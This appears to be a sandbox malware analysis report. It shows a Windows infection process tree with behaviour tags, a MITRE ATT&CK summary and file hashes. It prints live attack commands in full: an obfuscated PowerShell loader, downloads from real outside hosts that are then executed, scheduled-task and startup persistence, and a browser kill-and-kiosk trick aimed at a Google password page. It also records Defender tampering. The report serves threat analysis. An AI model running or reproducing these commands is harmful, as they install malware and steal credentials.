HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"4⤵
- Executes dropped EXE
PID:3572 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /sc minute /mo 1 /tn MyTask /tr ""C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Suh\niga.jar"" /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:3524
-
-
-
C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe"C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
PID:4164 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4532
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE"C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2084
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10147610121\am_no.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:3356 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5536
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "3c8CRmaZk4n" /tr "mshta \"C:\Temp\hdsNTGt9F.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5708
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\hdsNTGt9F.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5808 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1608
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148360101\71c36a0ccc.exe"C:\Users\Admin\AppData\Local\Temp\10148360101\71c36a0ccc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7040
-
-
C:\Users\Admin\AppData\Local\Temp\10148370101\68174908c0.exe"C:\Users\Admin\AppData\Local\Temp\10148370101\68174908c0.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"5⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7032 -
C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 8005⤵
- Program crash
PID:8116
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148390101\5dfd273896.exe"C:\Users\Admin\AppData\Local\Temp\10148390101\5dfd273896.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6228 -
C:\Users\Admin\AppData\Local\Temp\D85OAYSPRW6ZOQBEAL9BAA9T7.exe"C:\Users\Admin\AppData\Local\Temp\D85OAYSPRW6ZOQBEAL9BAA9T7.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6796
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148400101\c8e0738fcd.exe"C:\Users\Admin\AppData\Local\Temp\10148400101\c8e0738fcd.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6100
-
-
C:\Users\Admin\AppData\Local\Temp\10148410101\24fba0a6a6.exe"C:\Users\Admin\AppData\Local\Temp\10148410101\24fba0a6a6.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7404 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:7604
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6412 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27430 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3986eac7-0429-46d4-94cf-957976949368} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" gpu7⤵PID:6252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2432 -prefsLen 28350 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e94b7647-94a4-4d0f-b03e-ba8b628c4834} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" socket7⤵PID:6408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2820 -childID 1 -isForBrowser -prefsHandle 3136 -prefMapHandle 2868 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20d52cfe-0d19-4dfb-8153-beb9d30277db} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab7⤵PID:5976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2768 -childID 2 -isForBrowser -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 32840 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4982101d-6810-47f2-a09d-ac49dc1d71eb} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab7⤵PID:7712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4868 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4872 -prefsLen 32840 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6957ab6f-b778-4b4e-afdc-5d25e1586ca1} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" utility7⤵
- Checks processor information in registry
PID:8508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5296 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0bbb3ff8-72f2-4965-9f2e-d9677e5ccd4c} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab7⤵PID:8892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 4 -isForBrowser -prefsHandle 5440 -prefMapHandle 5448 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08199c5f-fb00-4ef7-94fd-09428b233649} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab7⤵PID:8904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5656 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac60805-86da-48ba-a626-8ce064f11cb5} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab7⤵PID:8916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148420101\1abbe437ef.exe"C:\Users\Admin\AppData\Local\Temp\10148420101\1abbe437ef.exe"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2100
-
-
C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exeC:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Suh\niga.jar1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2476
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7032 -ip 70321⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7320
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Indicator Removal
1File Deletion
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
1KB
MD5c2591b8d3c298836fc77aeec431b0a88
SHA156aed0d369ac0a912275f1d29075c78da932e2a7
SHA256bfca64476080417d90c94877309a740be930c08c7d60bd2579ff9b523b4d9c9f
SHA51295162e3fd633a27db36565cacc0c6e0ce220e080ca402849238cf4db42ed19772959c4d664a82cfbfeceac4271d49a0f1f5a2c0edceecbd100d7f7797a5211c8
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\activity-stream.discovery_stream.json
Filesize24KB
MD5ba54a92ff0fc7ce08c251afe86deb442
SHA1fb8af1da9439777c08b0330fb362f6b96bf4e60f
SHA25611b454ba2b8f7f0a73f1f7efe14f8b3973c2d0722cc4b7788dc7837399d784cb
SHA512e6eab7e55db735b3065e2bbc3220771f25865653dc3582d94ad96b533dbd9fa4264fbfeb19218c6a4cbeec1fd970159656253e11b5a9537cd5cf6da1e4646d56
-
Filesize
1.8MB
MD58c46fe8eee484e73651be335c8ee5e84
SHA19d9b074b985584f45cb6c7a620970dc6a599fb72
SHA2568863fb5e08bc5fe36263d7e0c34f14aa6102526a891a972ee2dc0ac5f6708619
SHA512e2ccec1c15c1d380000afacb0d0755aa25fb2964bfc62d0317f66271dd10964f4f3a02158878da794b99d18c2649b83a0b38387114962becd776234f39e289d3
-
Filesize
1.3MB
MD581791c3bf6c8d01341e77960eafc2636
SHA13a9e164448717ced3d66354f17d3bcba9689c297
SHA256c1bfa0e9313ea896eba6329eb52b70374df276493468ca30d633f825f91f52a0
SHA5120629a854e68e3742448447d732a6eb21bcf47dd451552f9699d227fed2733c54a508e4fbfd647c11bee2b5f031bbda0e9f16b5af84c800598a1fe72368aa2f47
-
Filesize
223KB
MD548399a2cd5d12883e5398bfaa9294ca1
SHA1df9062932f7c8c20247741f6fa87be58fd6189c2
SHA256d54292b98ca9ed8530d018d87e1d92c23a8e0822db61e814df393ca8f0519c61
SHA51256a3b88a7bf2f9cf546239820b67ba7d78e217b5a2380c68e439e72bbf6a27022c4c97dbfbe2b1c90d5f35cb6af8f64b53d407aac269b9c377e235ccd7094a6e
-
Filesize
159KB
MD536beea554789233179f8275b85035d42
SHA1f4bd79044a32adb1b678aaec13eda99d9f169215
SHA256df5311f9bb283913fd5295202df47050893b8ed4f29b1801e1720f5443e87163
SHA512f8868aa5609787a5222d393848ee8fdb2551691470c6f0e0f30242660c048f6ed7306aa4c46c6b0f359800b422c056fbb1f66fe750effd3a7c47fff7394de49d
-
Filesize
157KB
MD50326cd5c88d3e050505ab2393419f42b
SHA14c6fffddb7e847eed99ff8be2d6fdac646bd7814
SHA256def6fa4a8b3ee3c0a3ca8826fffc8d5757169bddd6f091e303038d8e32e154a1
SHA51276dcdb96c21bf010aac5e58d6cc3ad71538d7ed7a726df4a18be5e5201c191a75df7ea7c535c3529b12ccc1c5aa213d0821982e88763a680e461cb603ecf7903
-
Filesize
938KB
MD5fa6a1328fe5807c6c657df9cd2be8d2d
SHA129199b861dcf2f663715ff8079b6ee03f3b30acd
SHA256fbdbc0c3566e09aef10a253714963bb6649113e5fbfbad694938c2cf1fdf1ef0
SHA5129eab533743e20441768a135e9fe1b927122c3e717669f3dde967ca0db7f2513c0daed40fa57b3413f4148b4185a7ad05c9a7416783d6350dea65bf54a4d28188
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
1.8MB
MD51352d6cd58d12dc979e8a8ba9adbc5d2
SHA139dd8454f4a8c896284bbca4d855a76ff56bfad4
SHA2565c3e08f00ee169da6e3c5ce8927d2b00be5b4f12554e5c4dc9e35d6ba6c80834
SHA5123a37fe2a74f55941c909dbe4bcf09ebd8622e791308bffef68c186db156e33d935dd809b0e4975c0af7473207445af209a88baca6c4e180e634993a8a63b073e
-
Filesize
4.4MB
MD58d0c36e088d4a7a3c5dc5b8683bfb2f3
SHA1485ae76bdb6eaf901c3a99acda978310437b39cc
SHA256af20a57aaad683736f7e0bbbfd36cd7ca534ccf6c8ee595b5f88569428b550b3
SHA51214102ea2750c029cb0a52f092f3eb333dd75f2adc613683e64489cd8a81ed3eba82cb36c7dc85aa7c01bb56c4564cc1e96c426f5729bf8e462ca395ef90eca48
-
Filesize
364KB
MD59dd7f35baa732ab9c19737f7574f5198
SHA1af2f9db558e5c979839af7fc54a9c6f4c5f1945c
SHA256ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6
SHA512ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91
-
Filesize
3.0MB
MD5e9096bb11aede6b0be6eb0c5def2d13b
SHA1c99db3af289f2f732a00903cf2a23e01c12e785c
SHA256e0fdab4ba028da853a0152860341f1323aebad43eb400a04b4766918f713ed35
SHA512c362ba22f6e5cdd4b1a3c840485f1367be6ad24b02a604346461e9594c24b2438e898c4610cdc4d5f5a0ad79d7f557d65dabb2ed45a7a314e93a07848e5adc7c
-
Filesize
1.8MB
MD5bad7d7da3ec2460dfde0a42b4c867ef7
SHA132b580cae4664f824e483d24faa499edb2434f26
SHA256f1dd37aab171fe28c1d1a11786a595bf59d0b8c0aa3caeb9ceff641771c37130
SHA5127b6ee4ca5b5589f31371b554ee7724da35c090bc8f47f3b434efd565e7f88ad316dac53aac18583b6d2fd1c653354ae72176d071e3445a5c15b840e484589504
-
Filesize
948KB
